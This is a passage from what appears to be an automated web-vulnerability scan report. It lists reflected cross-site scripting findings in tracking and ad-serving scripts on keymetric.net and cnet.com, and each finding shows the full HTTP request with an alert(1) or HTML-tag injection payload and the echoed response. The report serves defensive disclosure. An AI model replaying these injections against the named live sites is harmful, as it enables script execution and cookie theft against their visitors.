Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:59 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5146

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...

val = 'Raw Query not available'; break;
case 'kmc1':
val = '918897899-1'; break;
case 'kmc1':
val = '918897899-1'; break;
case 'kmc2':
val = 'c99ce';alert(1)//e7ed632e646'; break;
case 'kmc2':
val = 'c99ce';alert(1)//e7ed632e646'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
...[SNIP]...

6.16. http://km6633.keymetric.net/KM2.js [lc3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc3 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbc6a'%3balert(1)//0e073a10466 was submitted in the lc3 parameter. This input was echoed as fbc6a';alert(1)//0e073a10466 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=fbc6a'%3balert(1)//0e073a10466&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:18:12 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5146

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
'; break;
case 'kmc1':
val = '918897899-1'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc3':
val = 'fbc6a';alert(1)//0e073a10466'; break;
case 'kmc3':
val = 'fbc6a';alert(1)//0e073a10466'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':
...[SNIP]...

6.17. http://km6633.keymetric.net/KM2.js [lc4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc4 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6159d'%3balert(1)//63a1129762e was submitted in the lc4 parameter. This input was echoed as 6159d';alert(1)//63a1129762e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=&lc4=6159d'%3balert(1)//63a1129762e&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:18:24 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5146

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
val = '6159d';alert(1)//63a1129762e'; break;
case 'kmc4':
val = '6159d';alert(1)//63a1129762e'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmrd':
...[SNIP]...

6.18. http://km6633.keymetric.net/KM2.js [lc5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc5 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99089'%3balert(1)//ff1e709af40 was submitted in the lc5 parameter. This input was echoed as 99089';alert(1)//ff1e709af40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=99089'%3balert(1)//ff1e709af40&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:18:37 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5146

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':
val = '99089';alert(1)//ff1e709af40'; break;
case 'kmc5':
val = '99089';alert(1)//ff1e709af40'; break;
case 'kmrd':
val = 'Referrer information not available'; break;
case 'newvisit':
val
...[SNIP]...

6.19. http://km6633.keymetric.net/KM2.js [lca parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lca request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b90d7'%3balert(1)//85b9dc2c311 was submitted in the lca parameter. This input was echoed as b90d7';alert(1)//85b9dc2c311 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=b90d7'%3balert(1)//85b9dc2c311&lag=&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:22 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5117

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case 'kmas':
val = '0'; break;
case 'cpca':
val = 'b90d7';alert(1)//85b9dc2c311'; break;
case 'kmca':
val = 'b90d7';alert(1)//85b9dc2c311'; break;
case 'cpag':
val = 'AdGroup not provided'; break;
case 'kmag':
val = 'AdGroup not pro
...[SNIP]...

6.20. http://km6633.keymetric.net/KM2.js [lmt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lmt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff6c7'%3balert(1)//ee247270ff0 was submitted in the lmt parameter. This input was echoed as ff6c7';alert(1)//ee247270ff0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=ff6c7'%3balert(1)//ee247270ff0&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:16:33 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5171

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
dGroup not provided'; break;
case 'kw':
val = 'Raw Query not available'; break;
case 'kmkw':
val = 'Raw Query not available'; break;
case 'kmmt':
val = 'ff6c7';alert(1)//ee247270ff0'; break;
case 'kmmt':
val = 'ff6c7';alert(1)//ee247270ff0'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmrq':
val = 'Raw Query no
...[SNIP]...

6.21. http://km6633.keymetric.net/KM2.js [rho parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the rho request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cb2f'%3balert(1)//ffe0caab215 was submitted in the rho parameter. This input was echoed as 9cb2f';alert(1)//ffe0caab215 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=9cb2f'%3balert(1)//ffe0caab215&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:16:46 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5084

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmrd':
val = '9cb2f';alert(1)//ffe0caab215'; break;
case 'newvisit':
val = 'true'; break;
default:
val = 'undefined';
}
return val;
}
var km_Acct = '6633';
var cbd = km_GBD(window.location.hostname);
cbd
...[SNIP]...

6.22. http://km6633.keymetric.net/KM2.js [rqu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the rqu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ce7a'%3balert(1)//c5080ee8c45 was submitted in the rqu parameter. This input was echoed as 5ce7a';alert(1)//c5080ee8c45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=5ce7a'%3balert(1)//c5080ee8c45&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:16:58 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5126

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
= 'Campaign not provided'; break;
case 'cpag':
val = 'AdGroup not provided'; break;
case 'kmag':
val = 'AdGroup not provided'; break;
case 'kw':
val = '5ce7a';alert(1)//c5080ee8c45'; break;
case 'kmkw':
val = '5ce7a';alert(1)//c5080ee8c45'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmrq':
...[SNIP]...

6.23. http://km6633.keymetric.net/KM2.js [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b025c'%3balert(1)//d0d68f25c02 was submitted in the vid parameter. This input was echoed as b025c';alert(1)//d0d68f25c02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=b025c'%3balert(1)//d0d68f25c02&rnd=0.14964773133397102&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=918897899-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:15:43 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5088

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
= km_GBD(window.location.hostname);
cbd = ((cbd=='localhost')?'':cbd);
kmSessionDur = 30;
kmSes = new Date();
kmSes.setTime(kmSes.getTime() + 1000 * 60 * kmSessionDur);
document.cookie = 'kmS6633=b025c';alert(1)//d0d68f25c02;expires=' + kmSes.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmCookieDays = 365;
kmExt = new Date();
kmExt.setTime(kmExt.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cooki
...[SNIP]...

6.24. http://km6633.keymetric.net/KMGCnew.js [disp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KMGCnew.js

Issue detail

The value of the disp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a93d4'%3balert(1)//0f01dddc3b0 was submitted in the disp parameter. This input was echoed as a93d4';alert(1)//0f01dddc3b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KMGCnew.js?mod=auto&cat=0&cbk=&tgt=&pat=888-793-4999&disp=%23%23%23-%23%23%23-%23%23%23%23a93d4'%3balert(1)//0f01dddc3b0&ctype=1&rnd=0.6861688662320375&vid=0bc70b60e622406ea5f4f1d9ed0e0f57 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:15:31 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 80

km_r(document.body,'888-793-4999','877-474-2252a93d4';alert(1)//0f01dddc3b0');

6.25. http://km6633.keymetric.net/KMGCnew.js [pat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KMGCnew.js

Issue detail

The value of the pat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20803'-alert(1)-'83f319c8a55 was submitted in the pat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KMGCnew.js?mod=auto&cat=0&cbk=&tgt=&pat=888-793-499920803'-alert(1)-'83f319c8a55&disp=%23%23%23-%23%23%23-%23%23%23%23&ctype=1&rnd=0.6861688662320375&vid=0bc70b60e622406ea5f4f1d9ed0e0f57 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:15:19 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 80

km_r(document.body,'888-793-499920803'-alert(1)-'83f319c8a55','877-474-2252');

6.26. http://mads.cnet.com/mac-ad [ADREQ&beacon parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload 887e4<a>871697164f9 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1887e4<a>871697164f9&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:39:44 GMT
Server: Apache/2.2
Content-Length: 582
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:39:44 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1887e4<a>871697164f9&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='188748716971649' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw19.cnet.com::139
...[SNIP]...

6.27. http://mads.cnet.com/mac-ad [ATTR parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the ATTR request parameter is copied into the HTML document as plain text between tags. The payload 6f671<a>5ad23d70e87 was submitted in the ATTR parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%206f671<a>5ad23d70e87&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:34:21 GMT
Server: Apache/2.2
Content-Length: 604
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:34:21 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%206f671<a>5ad23d70e87&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0"
...[SNIP]...

